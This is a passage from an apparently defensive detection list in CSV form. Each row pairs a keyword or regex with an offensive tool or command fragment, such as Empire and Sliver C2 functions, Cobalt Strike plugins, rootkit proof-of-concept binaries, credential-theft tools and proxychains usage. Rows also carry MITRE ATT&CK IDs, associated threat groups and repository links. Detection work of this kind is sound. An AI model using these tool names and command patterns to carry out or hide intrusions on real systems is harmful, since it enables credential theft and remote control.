- TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessPuTTYLocal*",".{0,1000}ProcessPuTTYLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessRDPFile*",".{0,1000}ProcessRDPFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessRDPLocal*",".{0,1000}ProcessRDPLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessSuperPuTTYFile*",".{0,1000}ProcessSuperPuTTYFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Process-TaskingPackets*",".{0,1000}Process\-TaskingPackets.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessThoroughLocal*",".{0,1000}ProcessThoroughLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcessThoroughRemote*",".{0,1000}ProcessThoroughRemote.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Processus-Thief/HEKATOMB*",".{0,1000}Processus\-Thief\/HEKATOMB.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*ProcessWinSCPLocal*",".{0,1000}ProcessWinSCPLocal.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ProcHideClient.exe -*",".{0,1000}ProcHideClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*ProcHideDrv_x64.sys*",".{0,1000}ProcHideDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*ProcProtectClient.exe *",".{0,1000}ProcProtectClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*produkey.zip*",".{0,1000}produkey\.zip.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*produkey_setup.exe*",".{0,1000}produkey_setup\.exe.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*produkey-x64.zip*",".{0,1000}produkey\-x64\.zip.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*profiles generate --save *",".{0,1000}profiles\sgenerate\s\-\-save\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*profiles new beacon *",".{0,1000}profiles\snew\sbeacon\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*profiles new --mtls *",".{0,1000}profiles\snew\s\-\-mtls\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ProgIDsUACBypass.*",".{0,1000}ProgIDsUACBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*program/replay.pl*",".{0,1000}program\/replay\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*projectb-temp/mimidogz*",".{0,1000}projectb\-temp\/mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*prosody2john.py*",".{0,1000}prosody2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Protocol/EfiGuard.h*",".{0,1000}Protocol\/EfiGuard\.h.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*Provided that the current user has the SeImpersonate privilege, this tool will have an escalation to SYSTEM*",".{0,1000}Provided\sthat\sthe\scurrent\suser\shas\sthe\sSeImpersonate\sprivilege,\sthis\stool\swill\shave\san\sescalation\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*prowler gcp --credentials-file path*",".{0,1000}prowler\sgcp\s\-\-credentials\-file\spath.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Proxmark*",".{0,1000}Proxmark.{0,1000}","offensive_tool_keyword","Proxmark","The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.","T1210 - T1561 - T1336 - T1335","TA0002 - TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/Proxmark/proxmark3","1","1","N/A","N/A","10","3016","893","2024-02-03T13:32:36Z","2014-03-16T23:36:31Z" "*proxmark3 -p /dev/ttyACM0*",".{0,1000}proxmark3\s\-p\s\/dev\/ttyACM0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Proxy bypass enabled for Neo4j connection*",".{0,1000}Proxy\sbypass\senabled\sfor\sNeo4j\sconnection.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*Proxy Shellcode Handler*",".{0,1000}Proxy\sShellcode\sHandler.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*proxy.py --dns * --dns_port * --clients*",".{0,1000}proxy\.py\s\-\-dns\s.{0,1000}\s\-\-dns_port\s\s.{0,1000}\s\-\-clients.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","0","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*proxy_bypass.py*",".{0,1000}proxy_bypass\.py.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","378","43","2024-03-28T07:45:00Z","2022-09-07T13:34:30Z" "*proxy_cmd_for_exec_by_sibling*",".{0,1000}proxy_cmd_for_exec_by_sibling.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*proxy_linux_amd64*",".{0,1000}proxy_linux_amd64.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4675","865","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z" "*proxychains -*",".{0,1000}proxychains\s\-.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains atexec.py*",".{0,1000}proxychains\satexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains cme 